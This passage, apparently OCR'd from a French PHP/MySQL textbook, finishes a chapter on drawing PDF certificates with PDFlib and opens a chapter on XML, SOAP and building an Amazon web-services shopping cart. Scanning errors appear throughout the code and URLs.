$startx, 180); 
pdf_show_xy ($pdf , "on $date.", Sstartx, 150); 
pdf_show_xy ($pdf , 'Authorised by:', $startx, 100); 

// Ajoute l'image bitmap de la signature 
$signature = pdf_load_image($pdf , 'png', 

'/Program Files/Apache Software /' . 

'Apache2.2/htdocs/phpmysql4e/chapitre30/ ' . 
'signature. png' , ' ' ) ; 
pdf_f it_image($pdf , Ssignature, 200, 75, ''); 
pdf_close_image($pdf , $signature) ; 

// Configure les couleurs pour le cachet 

pdf_setcolor ($pdf, 'both', 'cmyk', 43/255, 49/255, 1/255, 

67/255) ; // Bleu fonce 
pdf_setcolor ($pdf, 'both', 'cmyk', 1/255, 1/255, 1/255, 
1/255); // Noir 

// Dessine le ruban 1 
pdf_moveto($pdf , 630, 150); 
pdf_lineto($pdf , 610, 55); 
pdf_lineto($pdf , 632, 69); 
pdf_lineto($pdf , 646, 49); 
pdf_lineto($pdf , 666, 150); 
pdf_closepath($pdf ) ; 
pdf_fill($pdf ) ; 

// Met en relief le ruban 1 

pdf_moveto($pdf , 630, 150); 

pdf_lineto($pdf , 610, 55); 

pdf_lineto($pdf , 632, 69); 

pdf_lineto($pdf , 646, 49); 

pdf_lineto($pdf , 666, 150); 
pdf_closepath($pdf ) ; 
pdf_stroke($pdf ) ; 

// Dessine le ruban 2 
pdf_moveto($pdf , 660, 150); 
pdf_lineto($pdf , 680, 49); 
pdf_lineto($pdf , 695, 69); 
pdf_lineto($pdf , 716, 55); 
pdf_lineto($pdf , 696, 150); 
pdf_closepath($pdf ) ; 
pdf_fill($pdf ) ; 

// Met en relief le ruban 2 

pdf_moveto($pdf , 660, 150); 

pdf_lineto($pdf , 680, 49); 

pdf_lineto($pdf , 695, 69); 

pdf_lineto($pdf , 716, 55); 

pdf_lineto($pdf , 696, 150); 
pdf_closepath($pdf ) ; 



Chapitre 30 



Production de documents personnalises en PDF 801 



pdf_stroke($pdf ) ; 

pdf_setcolor ($pdf, 'both', 'cmyk', 1/255, 81/255, 81/255, 
20/255); // Rouge 

// Dessine le cachet 

draw_star(665, 175, 32, 57, 10, $pdf, true); 

// Met en relief le cachet 

draw_star(665, 175, 32, 57, 10, $pdf, false); 

// Termine la page et prepare son affichage 

pdf_end_page($pdf ) ; 

pdf_close($pdf ) ; 

$data = pdf_get_buffer($pdf ) ; 

// Produit les en-tetes pour aider le navigateur a choisir la 
// bonne application 

header ( 1 Content -type : application /pdf ' ) ; 

header( 'Content-disposition: inline; f ilename=test . pdf ' ) ; 

header( 'Content-length: ' . strlen ($data) ) ; 

// Affiche le PDF 
echo $data; 

} 

function draw_star($centerx, $centery, $points, $radius, 
$point_size, $pdf, $filled) { 
$inner_radius = $radius-$point_size; 

for ($i = 0; $i<=$points*2; $i++) { 
$angle= ($i*2*pi( ) ) / ($points*2) ; 

if($i%2) { 

$x = $radius*cos($angle) + $centerx; 

$y = $radius*sin($angle) + $centery; 
} else { 

$x = $inner_radius*cos($angle) + $centerx; 
$y = $inner_radius*sin($angle) + $centery; 

} 

if($i==0) { 

pdf_moveto($pdf , $x, $y); 
} else if ($i==$points*2) { 

pdf_closepath($pdf ) ; 
} else { 

pdf_lineto($pdf , $x, $y) ; 

} 

} 

if($filled) { 

pdf_f ill_stroke($pdf ) ; 
} else { 

pdf_stroke($pdf ) ; 

} 

} 
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Le certificat genera par ce script est presente a la Figure 30.7. Comme vous pouvez le 
constater, il ressemble beaucoup aux autres certificats, sauf que son cadre est plus 
simple et que le cachet est legerement different. En effet, nous les avons dessines direc- 
tement dans le document, au lieu de passer par un fichier d' image existant. 



Figure 30.7 

pdflib.php dessine le 
certificat dans un 
document PDF. 
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Nous allons maintenant etudier les parties de ce script que nous n' avons pas encore 
presentees avec les exemples precedents. 

Les certificats devant etre personnalises avec les informations personnelles des utilisa- 
teurs, nous allons creer le document en memoire au lieu de le creer dans un fichier. En 
effet, si nous l'avions cree dans un fichier, nous aurions du implementer des mecanis- 
mes permettant de generer des noms de fichiers uniques, d'empecher les utilisateurs 
d'examiner les certificats des autres utilisateurs et de supprimer les anciens certificats 
afm de liberer de la place sur le serveur. Pour creer un document en memoire, nous 
appelons pdf new( ) sans parametre suivi d'un appel a pdf open f ile( ), comme ceci : 

$pdf = pdf_new( ) ; 
pdf_open_file($pdf , ""); 

Notre cadre simplifie est compose de trois bandes : un cadre epais entoure de deux 
cadres plus fins. Ces cadres sont dessines comme des rectangles simples. 

Pour positionner ce cadre tout en pouvant modifier facilement la faille de la page ou 
l'apparence du cadre, nous allons le dessiner d'apres les variables que nous possedons, 
$width et $height, ainsi que quelques nouvelles variables : $inset, $border et $inner. 
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Nous utilisons $inset pour indiquer la distance en points entre le cadre et le bord de la 
page, $border pour indiquer l'epaisseur de la bande principale, et $inner pour preciser 
la distance entre la bande principale et les petites bandes. 

Si vous avez l'habitude de dessiner avec une autre API graphique, la bibliotheque 
PDFlib ne devrait pas vous surprendre. Si vous n'avez pas encore lu le Chapitre 20, il 
pourrait etre interessant de le faire maintenant, puisque l'utilisation de la bibliotheque 
gd ressemble enormement a celle de PDFlib en ce qui concerne la generation des 
images. 

Les bandes fines sont simples a dessiner. Pour creer un rectangle, nous utilisons la fonc- 
tion pdf rect(), qui prend en parametre l'identificateur du document PDF, les coor- 
donnees x et y du coin inferieur gauche du rectangle et la largeur et la hauteur du 
rectangle. Comme notre mise en page doit etre adaptable, nous calculons ces parametres 
d'apres les variables que nous possedons. 

pdf_rect($pdf , $inset-$inner, 
$inset-$inner, 
$width-2* ($inset-$inner) , 
$height-2* ($inset-$inner) ) ; 

L'appel a pdf rect ( ) definit un chemin ayant la forme d'un rectangle. Pour dessiner ce 
chemin, nous devons appeler la fonction pdf stroke ( ) , comme ceci : 

pdf_stroke($pdf ) ; 

Pour dessiner la bande large, nous devons preciser la largeur du trait. La largeur par 
defaut est de 1 point. L'appel suivant a pdf setlinewidth ( ) permet de modifier cette 
largeur, en fonction de $border (c'est-a-dire 10 points) : 

pdf_setlinewidth($pdf , $border); 

Apres avoir defini la largeur du trait, nous pouvons creer un rectangle avec pdf rect ( ) 
et appeler pdf stroke ( ) pour le dessiner. 

pdf_rect($pdf , $inset+$border/2, 

$inset+$border/2, 

$width-2* ($inset+$border/2) , 

$height-2*($inset+$border/2)) ; 
pdf_stroke($pdf ) ; 

Lorsque la bande large a ete dessinee, il ne faut pas oublier de reinitialiser la largeur du 
trait a 1 : 

pdf_setlinewidth($pdf , 1.0); 

Nous allons nous servir de pdf show xy ( ) pour positionner chaque ligne de texte du 
certificat. Pour la plupart des lignes de texte, nous nous servirons d'une marge gauche 
configurable ($startx) comme coordonnee x et d'une valeur empirique pour la coor- 
donnee y. Comme l'en-tete doit etre centre sur la page, nous devons connaitre sa largeur 
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pour pouvoir le positionner precisement. Pour cela, on fait appel a la fonction 
pdf stringwidth ( ). L'instruction suivante : 

pdf_stringwidth($pdf , 1 PHP Certification 1 , $font, '12'); 

renvoie la largeur de la chame "PHP Certification" en fonction de la police et de la 
taille de police actuelles. 

Comme pour les autres versions du certificat, nous ajoutons une signature sous la forme 
d'une image bitmap scannee. Les trois instructions suivantes : 

$signature = pdf_load_image ($pdf , 'png', 

'/Program Files/Apache Software /' . 

'Apache2.2/htdocs/phpmysql4e/chapitre30/ ' . 
'signature. png' , ' ' ) ; 
pdf_fit_image($pdf , Ssignature, 200, 75, ''); 
pdf_close_image($pdf , $signature) ; 

permettent d'ouvrir un fichier PNG contenant la signature, d'aj outer 1' image dans la 
page a l'emplacement specific et de fermer le fichier PNG. Vous pouvez evidemment 
choisir d' autres types de fichiers. 



— Info 

Lorsque vous chargez une image avec pdf load image (), donnez le chemin d'acces 
complet au fichier dans le systeme de fichiers. Ici, le chemin vers signature. png est celui d'un 
systeme Windows. 



L' element le plus difficile a ajouter a notre certificat avec PDFlib est certainement le 
cachet. II est impossible d'ouvrir automatiquement et d'inclure le fichier .wmf 
(Windows Meta File) contenant le cachet que nous avons deja utilise, mais nous 
pouvons dessiner n'importe quelle forme dans notre page. 

Pour dessiner une forme remplie comme celle du ruban, nous pouvons nous servir du 
code suivant. Nous commencons par choisir la couleur noire comme couleur de trait et 
la couleur bleue comme couleur de remplissage. 

pdf_setcolor($pdf , 'fill', 'rgb', 0, 0, .4, 0); // Bleu fonce. 
pdf_setcolor($pdf , 'stroke', 'rgb', 0, 0, 0, 0); // Noir. 

Nous definissons ensuite un polygone a cinq cotes pour dessiner l'un des rubans, puis 
nous le remplissons : 

pdf_moveto($pdf , 630, 150); 

pdf_lineto($pdf , 610, 55); 

pdf_lineto($pdf , 632, 69); 

pdf_lineto($pdf , 646, 49); 

pdf_lineto($pdf , 666, 150); 
pdf_closepath($pdf ) ; 
pdf_fill($pdf ) ; 
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Comme le contour du polygone doit egalement etre dessine, nous devons definir une 
seconde fois le meme chemin, mais en appelant pdf stroke () a la place de 
pdf fill(). 

L'etoile du cachet etant un motif repetitif, nous avons ecrit une fonction pour calculer le 
chemin a decrire. Notre fonction s'appelle draw star ( ) et elle prend en parametres les 
coordonnees cartesiennes du centre, le nombre de pointes a dessiner, le rayon du cachet, 
la longueur des pointes, un identificateur de document PDF et une valeur booleenne 
indiquant si la figure doit etre remplie ou non. 

La fonction draw star( ) se sert des fonctions trigonometriques de base pour calculer 
l'emplacement des points du contour. Pour chaque point de la figure, nous calculons un 
point sur la circonference du cercle et un point sur un cercle plus petit $point size 
dans le cercle exterieur, puis nous tracons une ligne entre ces deux points. II faut savoir 
que les fonctions trigonometriques de PHP comme cos ( ) et sin ( ) travaillent en radians 
et non en degres. 

A l'aide d'une fonction et de quelques notions en mathematiques, nous pouvons gene- 
rer precisement n'importe quelle forme complexe et repetitive. Si nous avions voulu 
dessiner un cadre plus elabore, nous aurions pu reprendre cette approche. 

Lorsque tous les elements de notre page sont produits, il ne reste plus qu'a fermer la 
page et le document. 

Gestion des problemes avec les en-tetes 

Un point sur lequel nous n' avons pas beaucoup insiste, mais qui est cependant impor- 
tant, est qu'il faut indiquer au navigateur le type des donnees que nous lui envoyons. 
II faut pour cela envoyer un en-tete HTTP de type de contenu, comme ceci : 

header( 'Content-type: application/msword ' ); 

ou : 

header( 'Content-type: application/pdf ' ); 

II faut egalement savoir que les navigateurs ne traitent pas tous ces en-tetes de la meme 
facon. Internet Explorer, notamment, choisit souvent d'ignorer le type MIME et tente 
de detecter automatiquement le type du fichier (ce probleme semble s'etre arrange avec 
les dernieres versions d'lnternet Explorer ; si vous le rencontrez, la solution la plus 
simple peut done etre de mettre a niveau votre navigateur). 

Certains de nos en-tetes ont tendance a poser probleme avec les en-tetes de controle de 
sessions. II y a plusieurs manieres de contourner cela, mais nous nous sommes rendu 
compte que l'utilisation de parametres GET a la place de parametres POST ou de para- 
metres de variables de sessions etait une possibilite. 
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Une autre solution consiste a ne pas utiliser un fichier PDF en ligne, en demandant a 
l'utilisateur de le telecharger, comme dans l'exemple Bonjour tout le monde de PDFlib. 

Vous pouvez egalement eviter certains problemes si vous etes pret a ecrire deux 
versions legerement differentes de votre code, une pour Firefox et une pour Internet 
Explorer. 

Pour aller plus loin 

Pour completer ce projet, vous pouvez ajouter des questions devaluation plus realistes. 
Nous ne nous en sommes pas occupes ici, car notre exemple est essentiellement une 
demonstration des differents moyens de fournir vos propres documents en ligne. 

Parmi les exemples de documents personnalises que vous pouvez fournir en ligne, on 
peut citer les documents legaux, les formulaires de commandes ou d' applications 
partiellement remplis, ou les formulaires necessaires aux services gouvernementaux. 

Nous vous suggerons de visiter le site d'Adobe, http://www.adobe.com, si vous 
souhaitez vous documenter plus precisement sur les formats PDF et FDF 

La suite 

Dans le chapitre suivant, nous etudierons les fonctionnalites XML de PHP et nous les 
utiliserons pour nous connecter a l'API des services web d' Amazon avec REST et 
SOAP. 



31 



Connexion a des services web 

avec XML et SOAP 



Au cours de ces dernieres annees, XML (Extensible Markup Language) a pris une part 
de plus en plus importante dans la communication des informations. Dans ce chapitre, 
nous utiliserons l'interface des services web d'Amazon pour construire un panier 
virtuel sur notre site, qui utilisera Amazon comme fournisseur du service (cette applica- 
tion s'appelle Tahuayo, qui est le nom d'une tribu amazonienne). Pour ce projet, nous 
utiliserons deux methodes differentes, SOAP et REST, cette derniere etant egalement 
appelee XML par HTTP. Pour implementer ces deux methodes, nous utiliserons la 
bibliotheque SimpleXML integree a PHP et l'extension NuSOAP. 

Presentation du projet : manipuler XML et les services web 

Ce projet a deux buts : le premier est de vous aider a comprendre ce que represented XML 
et SOAP et comment les utiliser en PHP ; le second est d'utiliser ces technologies pour 
communiquer avec le monde exterieur. Nous avons choisi le programme des services web 
d'Amazon car c'est un exemple interessant susceptible de vous servir pour votre propre site. 

Amazon a depuis longtemps mis en place un programme permettant de faire la publicite 
de ses produits sur d'autres sites. A partir de votre site, un utilisateur peut ainsi suivre 
un lien vers la page d'un produit vendu sur le site d'Amazon et, s'il achete ce produit, 
vous recevez une petite commission. 

Le programme des services web vous permet plutot d'utiliser Amazon comme un 
moteur de recherche : vous pouvez le parcourir et afficher les resultats sur votre propre 
site, ou remplir directement le panier virtuel d'un de vos utilisateurs avec les articles 
qu'il a selectionnes tout en parcourant votre site. En d'autres termes, le client utilise 
votre site jusqu'a la commande, ce qui l'oblige a passer par Amazon. 
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Les communications entre vous et Amazon peuvent avoir lieu de deux facons. La 
premiere consiste a utiliser XML par HTTP, egalement connu comme REST (Repre- 
sentational State Transfer). Pour effectuer une recherche avec cette methode, par exem- 
ple, on envoie une requete HTTP classique demandant l'information recherchee et 
Amazon repondra avec un document XML contenant la reponse. On peut ensuite analy- 
ser ce document XML et afficher les resultats de la recherche en utilisant l'interface de 
notre choix. Lenvoi et la reception des donnees par HTTP est tres simple, mais la faci- 
lite d' analyse du document resultant depend de sa complexite. 

Le second moyen de communiquer avec Amazon consiste a utiliser SOAP, qui est l'un 
des protocoles standard pour les services web. Bien qu'il ait signifie initialement Simple 
Object Access Protocol, on s'est apercu que ce protocole n'etait pas si simple que cela 
et que ce nom etait un peu trompeur. On l'appelle done toujours SOAP, mais ce n'est 
plus un acronyme. 

Dans ce projet, nous construirons un client SOAP capable d'envoyer des requetes et 
de recevoir les reponses du serveur SOAP d' Amazon. Ces reponses contiennent les 
memes informations que celles obtenues par REST, mais nous utiliserons une appro- 
che differente pour en extraire les donnees : nous ferons appel a la bibliotheque 
NuSOAP. 

Le dernier but de ce projet consistera a construire notre propre site de vente de livres en 
ligne en utilisant Amazon comme serveur. Nous implementerons deux versions : une 
avec REST, l'autre avec SOAP. 

Avant de passer aux differents elements de notre application, nous allons prendre le 
temps de nous familiariser avec la structure et 1' utilisation de XML, ainsi qu'avec les 
services web en general. 

Introduction a XML 

Passons un peu de temps a etudier XML et les services web au cas ou ces concepts ne 
vous seraient pas familiers. 

Comme nous l'avons deja mentionne, XML signifie Extensible Markup Language. Sa 
specification est disponible sur le site du W3C, http://www.w3.org/XML/. 

XML derive de SGML, Standard Generalized Markup Language. Si vous connaissez 
deja HTML, Hypertext Markup Language (ci ce n'est pas le cas, vous lisez ce livre a 
l'envers), vous n'aurez pas de difficulte a comprendre les concepts de XML. 

XML est un langage a balises pour representer des documents sous forme textuelle. Le 
Listing 31.1 contient un exemple de document XML qui est une reponse envoyee par 
Amazon a une requete XML par HTTP utilisant un certain nombre de parametres. 
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Listing 31.1 : Document XML decrivant la premiere edition de ce livre 



<?xml version="1 .0" encoding="UTF-8"?> 
<ItemLookupResponse 

xmlns="http : / /webservices . amazon . com/AWSECommerceService/2005-03-23"> 
<Items> 

<Request> 
<IsValid>True</ IsValid> 
<ItemLookupRequest> 
<IdType>ASIN</IdType> 
<ltemld>0672317842</ltemld> 
<ResponseGroup>Similarities</ResponseGroup> 
<ResponseGroup>Small</ResponseGroup> 
</ItemLookupRequest> 
</Request> 
<Item> 

<ASIN>067231 7842</ASIN> 

<DetailPageURL>http: / /www. amazon . com/ PHP-MySQL- Development -Luke-Welling/ 

dp/067231 7842%3F%26linkCode%3Dsp1%26camp%3D2025%26creative%3D165953%26 

creativeASIN%3D0672317842 

</DetailPageURL> 

<ItemAttributes> 

<Author>Luke Welling</Author> 

<Author>Laura Thomson</Author> 

<Manuf act u re r>Sams</ Manufacture r> 

<ProductGroup>Book</ProductGroup> 

<Title>PHP and MySQL Web Development</Title> 
</ItemAttributes> 
<SimilarProducts> 
<SimilarProduct> 

<ASIN>1590598628</ASIN> 

<Title>Beginning PHP and MySQL: From Novice to 
Professional, 

Third Edition (Beginning from Novice to 

Prof essional)< /Tit le> 
</ Similar Product > 
<SimilarProduct> 

<ASIN>032152599X</ASIN> 

<Title>PHP 6 and MySQL 5 for Dynamic Web Sites: 
Visual QuickPro Guide</Title> 
</ Similar Product > 
<SimilarProduct> 

<ASIN>B00005UL4F</ASIN> 

<Title>JavaScript Definitive Guide</Title> 
</SimilarProduct> 
<SimilarProduct> 

<ASIN>1 5905961 45</ASIN> 

<Title>CSS Mastery: Advanced Web Standards 

Solutions</Title> 
</SimilarProduct> 
<SimilarProduct> 

<ASIN>059600543K/ASIN> 

<Title>Web Database Applications with PHP & MySQL, 
2nd Edition</Title> 
</ Similar Product > 
</SimilarProducts> 
</Item> 
</Items> 

</ItemLookupResponse> 
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Ce document commence par la ligne suivante : 

<?xml version="1 .0" encoding="UTF-8"?> 

Cette declaration standard indique que le document qui suit sera du XML encode en 
UTF-8. 

Examinons maintenant le coips du document. II est forme de paires de balises ouvrantes 
et fermantes comme : 

<Item> 
</Item> 

Item est un element, exactement comme en HTML et, comme en HTML, les elements 
peuvent etre imbriques, comme dans cet exemple de l'attribut ItemAttributes, 
contenu dans l'element Item et qui contient lui-meme des elements comme Author : 

<ItemAttributes> 

<Author>Luke Welling</Author> 

<Author>Laura Thomson</Author> 

<Manufacturer>Sams</ Manufacturer 

<ProductGroup>Book</ProductGroup> 

<Title>PHP and MySQL Web Development</Title> 
</ItemAttributes> 

II y a cependant quelques differences par rapport a HTML. La premiere est que toute 
balise ouvrante doit etre appariee avec une balise fermante. Une exception a cette regie est 
celle des elements vides, qui peuvent s'ouvrir et se fermer dans la meme balise puisqu'ils ne 
contiennent aucun texte. Si vous connaissez XHTML, vous avez deja rencontre la balise 
<br />, qui remplace <br> justement pour cette raison. En outre, tous les elements doivent 
etre correctement imbriques. Vous vous en sortirez peut-etre avec <b><i>Text</b></i> 
en HTML mais, pour que ce soit du XML ou du XHTML valide, les balises doivent etre 
correctement imbriquees, c'est-a-dire <b><i>Text</i></b>. 

La principale difference que vous remarquerez entre XML et HTML est qu'il semble 
que nous creons nos propres balises au fur et a mesure ! C'est le gros avantage de XML 
et c'est ce qui lui donne sa souplesse. Vous pouvez structurer vos documents pour qu'ils 
correspondent aux donnees que vous voulez stocker. Vous pouvez formaliser la struc- 
ture des documents XML en ecrivant soit une DTD (Document Type Definition), soit un 
schema XML. Ces deux documents servent a decrire la structure d'un document XML. 
Vous pouvez ainsi considerer une DTD ou un schema comme une declaration de classe 
et le document XML comme une instance de cette classe. Dans notre exemple, nous 
n'utilisons ni DTD ni schema. 

Le schema XML actuel d'Amazon pour les services web est disponible a l'URL 
http://webseiMces.amazonxoni/AWSECommerceService/AWSECommerceService.xsd. 

Vous devriez pouvoir l'ouvrir directement dans votre navigateur. 
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Vous remarquerez que, a part la declaration XML initiale, tout le corps de notre exem- 
ple de document est contenu dans l'element ItemLookupResponse. Celui-ci est appele 
element ratine du document. Etudions-le de plus pres : 

<ItemLookupResponse 

xmlns="http : / /webservices . amazon . com/AWSECommerceService/2005-03-23"> 

Cet element possede un attribut un peu inhabituel, Vespace de noms XML. Vous n'avez 
pas besoin de comprendre les espaces de noms pour ce projet, mais ils peuvent etre tres 
utiles. L'idee de base consiste a qualifier les noms des elements et des attributs avec un 
espace de noms pour qu'il n'y ait pas de collisions lorsque Ton manipule des documents 
provenant de plusieurs sources. 

Si vous voulez en savoir plus sur les espaces de noms, vous pouvez lire le document 
"Namespaces in XML Recommendation" , disponible a l'URL http://www.w3.org/TR/ 
REC-xml-names/. 

II existe un nombre incommensurable de ressources qui vous permettront d'en savoir 
plus sur XML en general. Le site du W3C est un bon point de depart et il existe egale- 
ment des centaines d'excellents livres et didacticiels en ligne. ZVON.org propose l'un 
des meilleurs didacticiels en ligne sur XML. 

Introduction aux services web 

Les services web sont des interfaces d' applications disponibles via le Web. En termes 
de programmation orientee objet, un service web est une classe qui expose ses metho- 
des publiques par le Web. Ces services sont desormais largement repandus et certaines 
grosses societes rendent disponibles certaines de leurs fonctionnalites par leur interme- 
diaire. 

Google, Amazon, eBay et PayPal, par exemple, offrent un certain nombre de services 
web. Apres avoir mis en place un client vers l'interface d'Amazon dans ce chapitre, 
vous constaterez qu'il est egalement tres simple de faire de meme pour Google. Pour 
plus d' informations sur l'interface de Google, consultez la page http:// 
code.google.com/. 

Plusieurs protocoles essentiels sont impliques dans ces appels de fonction distantes ; 
SOAP et WSDL sont deux des plus importants. 

SOAP 

SOAP est un protocole de messages de type "requete -reponse" qui permet aux clients 
d'invoquer des services web et aux serveurs de repondre. Chaque message SOAP, que 
ce soit une requete ou une reponse, est un simple document XML. Le Listing 31.2 
montre un exemple de requete que vous pourriez envoy er a Amazon. En fait, il s'agit de 
la requete qui a produit la reponse que nous avons presentee dans le Listing 31.1. 
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Listing 31.2 : Requete SOAP pour une recherche d'apres I'ASIN 

<SOAP-ENV:Envelope> 
<SOAP-ENV:Body> 
<m : ItemLookup> 
<m:Request> 

<m : AssociateTag>webservices-20</m :AssociateTag> 

<m: IdType>ASIN</m: IdType> 

<m: Itemld>0672317842</m: Itemld> 

<m:AWSAccessKeyId>0XKKZBBJHE7GNBWF2ZG2</m:AWSAccessKeyId> 
<m : ResponseGroup>Similarities</m: ResponseGroup> 
<m : ResponseGroup>Small</m : ResponseGroup> 
</m:Request> 
</m : ItemLookup> 
</SOAP-ENV:Body> 
</SOAP-ENV:Envelope> 



Le message SOAP commence par une declaration indiquant qu'il s'agit d'un document 
XML. L' element racine de tous les messages SOAP est l'enveloppe SOAP Elle inclut 
l'element Body qui contient la veritable requete. 

Cette requete est un ItemLookup, qui est une instance demandant au serveur d'Amazon 
de rechercher un article particulier dans sa base de donnees en utilisant I'ASIN 
(Amazon.com Standard Item Number). L' ASIN est un identifiant unique permettant de 
designer chaque produit de la base de donnees d'Amazon. 

Vous pouvez considerer un ItemLookup_comme un appel de fonction sur une machine 
distante et les elements qu'il contient comme les parametres passes a cette fonction. Ici, 
apres avoir passe la valeur "ASIN" via l'element IdType, nous transmettons le veritable 
ASIN (0672317842) via l'element Itemld (il s'agit de l'identifiant de la premiere 
edition de ce livre). II faut egalement passer le AssociateTag, qui est votre identifiant 
d'associe, le type des reponses que vous attendez (via l'element ResponseGroup) et le 
AWSAccessKeyld, qui est un jeton developpeur qu' Amazon vous donnera. 
La reponse a cette requete ressemble au document XML que nous avons examine au 
Listing 31.1, mais elle est encapsulee dans une enveloppe SOAP. 
Lorsque Ton manipule SOAP, on produit les requetes SOAP et on interprete les repon- 
ses par programme, en utilisant une bibliotheque SOAP quel que soit le langage de 
programmation utilise. C'est une bonne chose car cela evite de devoir construire la 
requete et interpreter la reponse manuellement. 

WSDL 

WSDL signifie Web Services Description Language (on le prononce souvent "wiz- 
dul"). Ce langage sert a decrire l'interface vers les services disponibles sur un certain 
site. Si vous voulez consulter le document WSDL qui decrit les services web d'Amazon 
utilises dans ce chapitre, vous le trouverez a l'URL http://ecs.amazonaws.com/ 
AWSECommerceService/AWSECommerceService.wsdl. 
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Comme vous le constaterez si vous suivez ce lien, les documents WSDL sont bien plus 
complexes que les messages SOAP. Si vous avez le choix, produisez-les et interpretez- 
les toujours par programme. 

Si vous voulez en savoir plus sur WSDL, consultez la recommandation du W3C, sur la 
page http://www.w3.org/TR/wsdl20/. 

Composants de la solution 

Pour construire notre projet, nous avons besoin de quelques composants. Outre les plus 
evidents - une interface vers le panier virtuel pour le montrer aux clients et le code pour se 
connecter a Amazon via REST ou SOAP -, certains composants auxiliaires sont necessai- 
res. Apres avoir recupere un document XML, notre code doit pouvoir 1' analyser pour en 
extraire les informations que Ton souhaite afficher dans le panier. Pour respecter les 
conditions d'Amazon et ameliorer les performances, il faut utiliser un cache. Enfin, la 
commande devant etre passee aupres d'Amazon, on doit pouvoir transmettre le contenu 
du panier d'un utilisateur a Amazon et rediriger cet utilisateur vers ce service. 

Le panier virtuel sera done la partie frontale de ce systeme. Nous avons deja construit 
un panier virtuel au Chapitre 26 mais, comme cette partie n'est pas l'objectif principal 
de ce projet, nous n'en utiliserons qu'une version simplifiee. Nous nous contenterons de 
fournir un panier de base pour pouvoir savoir ce que veut acheter le client et le signaler 
a Amazon lors de la validation de la commande. 

Utilisation de I'interface des services web d'Amazon 

Pour utiliser I'interface des services web d'Amazon, vous devez vous enregistrer sur la 
page http://aws.amazon.com/ afin d'obtenir un jeton developpeur qui servira a vous 
identifier aupres d'Amazon lorsque vous lui enverrez vos requetes. 

Vous pouvez aussi demander un identifiant d'associe Amazon qui vous permettra de rece- 
voir une commission si des personnes achetent des produits en passant par votre interface. 

Le centre de ressource des developpeurs pour les services web d'Amazon (AWS pour 
Amazon Web Services), http://deveIoper.amazonwebservices.com/, contient un grand 
nombre de documentations, de didacticiels et d'exemples de code pour se connecter a 
tous les services web d'Amazon via SOAP et REST. En suivant les exemples de ce 
chapitre, vous disposerez d'un systeme fonctionnel et vous apprendrez les notions 
fondamentales des connexions a AWS et de la recuperation des informations, mais vous 
devez passer un peu de temps a lire la documentation si vous comptez ameliorer cette 
application. Vous pouvez, par exemple, rechercher et recuperer un grand nombre d' arti- 
cles en utilisant soit I'interface de navigation soit celle de recherche directe. Les donnees 
qui vous sont renvoyees peuvent etre structurees de facons tres variees en fonction des 
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elements dont vous avez besoin. Toutes ces informations sont documentees dans le 
guide du developpeur AWS, disponible sur le site web. 

— Info 

AWSZone.com (http://www.awszone.com/) est une autre ressource tres interessante. Sur ce 
site, vous pouvez tester des requetes REST et SOAP et voir a la fois la structure de la requete et 
celle de la reponse, ce qui vous permet de savoir comment acceder aux donnees qui vous sont 
renvoyees. En outre, les reponses de test peuvent vous aider a connaTtre le ResponseGroup 
precis que vous devriez utiliser pour obtenir les meilleurs resultats avec la vitesse maximale. 



Lorsque vous demandez un jeton developpeur, vous devez accepter 1' accord de 
licence. Lisez-le attentivement car il ne s'agit pas du bla-bla habituel des licences 
logicielles. Certaines conditions de cette licence ont, en effet, une importance au 
cours de 1' implementation : 

■ Vous ne pouvez pas faire plus d'une requete par seconde. 

■ Vous devez mettre en cache les donnees provenant d'Amazon. 

■ Vous pouvez mettre en cache la plupart des donnees pendant vingt-quatre heures et 
certains attributs stables pendant trois mois. 

■ Si vous mettez en cache les prix ou la disponibilite des articles pendant plus de une 
heure, vous devez le signaler au client. 

■ Vous devez creer un lien vers une page d'Amazon.com et ne pas lier du texte ou des 
images telecharges sur Amazon vers un autre site commercial. 

Avec un nom aussi dur a retenir que Tahuoyo.com, aucune publicite et aucune bonne raison 
de passer par notre site au lieu d'aller directement sur Amazon.com, il n'y a pas besoin de 
prendre de mesures particulieres pour que les requetes soient inferieures a une par seconde. 

Ici, on implementera le cache pour respecter les conditions des points 2 et 4. L' applica- 
tion conservera les images en cache pendant vingt-quatre heures et les donnees sur les 
produits (dont leur prix et leur disponibilite) pendant une heure. 

Notre application respecte egalement le cinquieme point. Les articles de la page princi- 
pale auront des liens vers des pages detaillees de notre site, mais on etablira un lien vers 
Amazon lorsqu'une commande sera terminee. 

Analyse XML : reponses REST 

L'interface la plus utilisee pour les services web d'Amazon se sert de REST. Elle 
accepte done une requete HTTP normale et renvoie un document XML. Pour utiliser 
cette interface, vous devez pouvoir analyser la reponse XML que vous renvoie Amazon, 
par exemple en vous servant de la bibliotheque SimpleXML de PHP. 
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Utilisation de SOAP avec PHP 

L' autre interface, qui offre les memes services web, repose sur SOAP. Pour acceder aux 
services avec SOAP, vous devez utiliser une bibliotheque SOAP pour PHP. II en existe 
une integree mais, comme elle n'est pas toujours installee par defaut, vous pouvez utili- 
ser NuSOAP, qui est ecrite en PHP et qui ne necessite done pas de compilation. II s'agit 
d'un simple fichier qu'il faut inclure avec require once(). 

Vous pouvez telecharger NuSOAP a partir de http://sourceforge.net/projects/nusoap/. 
Cette bibliotheque est disponible sous les termes de la licence Lesser GPL : vous pouvez 
done l'utiliser dans n'importe quelle application, y compris dans des applications non libres. 



Mise en cache 

Comme on l'a mentionne precedemment, l'une des conditions qu'impose Amazon aux 
developpeurs est que les donnees telechargees sur Amazon via ses services web doivent 
etre mises en cache. Vous devez done trouver un moyen de stacker et de reutiliser les 
donnees telechargees jusqu' a ce que leur date d'expiration soit passee. 



Presentation de la solution 

Ce projet utilise la meme approche orientee evenement que celle des Chapitres 27 et 
28. Nous ne dessinerons pas de diagramme de flux puisque le systeme ne comprend que 
quelques ecrans lies entre eux de facon simple. Les visiteurs arriveront sur la page prin- 
cipale de Tahuayo, qui est presentee a la Figure 31.1. 



Figure 31.1 

La premiere page de 
Tahuayo presente toutes 
les fonctionnalites du 
site : navigation par 
categorie, recherche et 
panier virtue!. 
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Comme vous pouvez le constater, les fonctionnalites principales consistent a afficher les 
categories selectionnees et les articles de ces categories. Par default, on affiche sur cette 
page les meilleures ventes actuelles dans la categorie "Non Fiction". Si un utilisateur clique 
sur une autre categorie, il verra apparaitre un ecran analogue pour cette categorie. 



— Info 

Amazon designant les categories comme des nceuds de navigation, vous verrez souvent 
cette expression dans notre code et dans la documentation off icielle. 

La documentation fournit la liste des nceuds de navigation les plus connus. En outre, si 
vous recherchez un nom de nceud particulier, vous pouvez parcourir le site normal 
d' Amazon et le lire dans l'URL ou utiliser la ressource BrowseNodes disponible a partir 
de http://www.browsenodes.com/. II est d'ailleurs assez frustrant de constater qu'on 
